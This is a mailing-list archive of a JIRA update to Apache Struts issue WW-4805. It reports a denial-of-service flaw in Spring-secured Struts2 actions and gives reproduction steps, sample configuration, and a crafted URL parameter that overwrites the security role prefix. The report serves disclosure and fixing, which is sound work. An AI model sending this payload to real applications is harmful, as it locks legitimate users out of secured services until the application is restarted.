struts-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Yasser Zamani (JIRA)" <j...@apache.org>
Subject [jira] [Updated] (WW-4805) At least a DoS attack is available for Spring secured actions
Date Sat, 17 Jun 2017 20:45:02 GMT

     [ https://issues.apache.org/jira/browse/WW-4805?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Yasser Zamani updated WW-4805:
------------------------------
    Description: 
This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned
at section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]

Attack Steps:
# An anonymous user logins as an authenticated user.
# Then tries
{noformat}
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
{noformat}
 where {action0-actionN} are actions available for users

Attack Impacts:
By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles
even if they authenticate via login! so services are down and webapp restart is required to
back to normal!!!

Configuration Example:
* spring-security.xml
{code:xml}
    <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
    <http auto-config="true" use-expressions="false">
        <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
    </http>
    <authentication-manager erase-credentials="false">
        <authentication-provider>
            <user-service>
                <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                <user name="user" password="user" authorities="ROLE_USER" />
            </user-service>
        </authentication-provider>
    </authentication-manager>
{code}

* applicationContext.xml
{code:xml}
<bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
{code}

* struts.xml
{code:xml}
        <action name="admin" class="secureAction" method="admin">
            <result name="success" type="json" />
        </action>
        <action name="user" class="secureAction" method="user">
            <result name="success" type="json" />
        </action>
{code}

* SecureAction.java
{code:java}
package me.zamani.yasser.ww_convention.actions;
import org.springframework.security.access.annotation.Secured;

public class SecureAction {

    @Secured({"ROLE_ADMIN"})
    public String admin() {
        return "success";
    }
    @Secured({"ROLE_USER"})
    public String user() {
        return "success";
    }
}
{code}

* login via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as user.

* open 
{noformat}
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
{noformat}

* in another browser, login via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as admin.

* try to access 
{noformat}
http://{ip}:{port}/admin
{noformat}
 which fails!

* also repeat 5 and try open
{noformat}
 http://{ip}:{port}/user
{noformat}
 which also fails!

* Services are down and webapp restart is required to back to normal.

  was:
This is a DoS attack example when Struts2 user uses Spring to secure his actions, like mentioned
at section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]

Attack Steps:
# An anonymous user logins as an authenticated user.
# Then tries
{noformat}
http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
{noformat}
 where {action0-actionN} are actions available for users

Attack Impacts:
By replacing `rolePrefix`, attacker blocks access to secured actions for all defined roles
even if they authenticate via login! so services are down and webapp restart is required to
back to normal!!!

Configuration Example:
# spring-security.xml
{code:xml}
    <global-method-security secured-annotations="enabled" proxy-target-class = "true" />
    <http auto-config="true" use-expressions="false">
        <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
    </http>
    <authentication-manager erase-credentials="false">
        <authentication-provider>
            <user-service>
                <user name="admin" password="admin" authorities="ROLE_ADMIN" />
                <user name="user" password="user" authorities="ROLE_USER" />
            </user-service>
        </authentication-provider>
    </authentication-manager>
{code}

# applicationContext.xml
{code:xml}
<bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
{code}

# struts.xml
{code:xml}
        <action name="admin" class="secureAction" method="admin">
            <result name="success" type="json" />
        </action>
        <action name="user" class="secureAction" method="user">
            <result name="success" type="json" />
        </action>
{code}

# SecureAction.java
{code:java}
package me.zamani.yasser.ww_convention.actions;
import org.springframework.security.access.annotation.Secured;

public class SecureAction {

    @Secured({"ROLE_ADMIN"})
    public String admin() {
        return "success";
    }
    @Secured({"ROLE_USER"})
    public String user() {
        return "success";
    }
}
{code}

# login via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as user.

# open 
{noformat}
http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
{noformat}

# in another browser, login via 
{noformat}
http://{ip}:{port}/login
{noformat}
 as admin.

# try to access 
{noformat}
http://{ip}:{port}/admin
{noformat}
 which fails!

# also repeat 5 and try open
{noformat}
 http://{ip}:{port}/user
{noformat}
 which also fails!

# Services are down and webapp restart is required to back to normal.


> At least a DoS attack is available for Spring secured actions
> -------------------------------------------------------------
>
>                 Key: WW-4805
>                 URL: https://issues.apache.org/jira/browse/WW-4805
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core, Plugin - Spring
>    Affects Versions: 2.3.32, 2.5.10
>            Reporter: Yasser Zamani
>              Labels: github-import, patch, security
>             Fix For: 2.3.33, 2.5.next
>
>
> This is a DoS attack example when Struts2 user uses Spring to secure his actions, like
mentioned at section `Initializing Actions from Spring` of [spring-plugin|https://struts.apache.org/docs/spring-plugin.html]
> Attack Steps:
> # An anonymous user logins as an authenticated user.
> # Then tries
> {noformat}
> http://{ip}:{port}/{action0-actionN}?advisors[{0-n}].advice.accessDecisionManager.decisionVoters[{0-n}].rolePrefix=breakit
> {noformat}
>  where {action0-actionN} are actions available for users
> Attack Impacts:
> By replacing `rolePrefix`, attacker blocks access to secured actions for all defined
roles even if they authenticate via login! so services are down and webapp restart is required
to back to normal!!!
> Configuration Example:
> * spring-security.xml
> {code:xml}
>     <global-method-security secured-annotations="enabled" proxy-target-class = "true"
/>
>     <http auto-config="true" use-expressions="false">
>         <intercept-url pattern="/**" access="IS_AUTHENTICATED_ANONYMOUSLY" />
>     </http>
>     <authentication-manager erase-credentials="false">
>         <authentication-provider>
>             <user-service>
>                 <user name="admin" password="admin" authorities="ROLE_ADMIN" />
>                 <user name="user" password="user" authorities="ROLE_USER" />
>             </user-service>
>         </authentication-provider>
>     </authentication-manager>
> {code}
> * applicationContext.xml
> {code:xml}
> <bean id="secureAction" class="me.zamani.yasser.ww_convention.actions.SecureAction"/>
> {code}
> * struts.xml
> {code:xml}
>         <action name="admin" class="secureAction" method="admin">
>             <result name="success" type="json" />
>         </action>
>         <action name="user" class="secureAction" method="user">
>             <result name="success" type="json" />
>         </action>
> {code}
> * SecureAction.java
> {code:java}
> package me.zamani.yasser.ww_convention.actions;
> import org.springframework.security.access.annotation.Secured;
> public class SecureAction {
>     @Secured({"ROLE_ADMIN"})
>     public String admin() {
>         return "success";
>     }
>     @Secured({"ROLE_USER"})
>     public String user() {
>         return "success";
>     }
> }
> {code}
> * login via 
> {noformat}
> http://{ip}:{port}/login
> {noformat}
>  as user.
> * open 
> {noformat}
> http://{ip}:{port}/user?advisors[0].advice.accessDecisionManager.decisionVoters[0].rolePrefix=breakit
> {noformat}
> * in another browser, login via 
> {noformat}
> http://{ip}:{port}/login
> {noformat}
>  as admin.
> * try to access 
> {noformat}
> http://{ip}:{port}/admin
> {noformat}
>  which fails!
> * also repeat 5 and try open
> {noformat}
>  http://{ip}:{port}/user
> {noformat}
>  which also fails!
> * Services are down and webapp restart is required to back to normal.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)

Mime
View raw message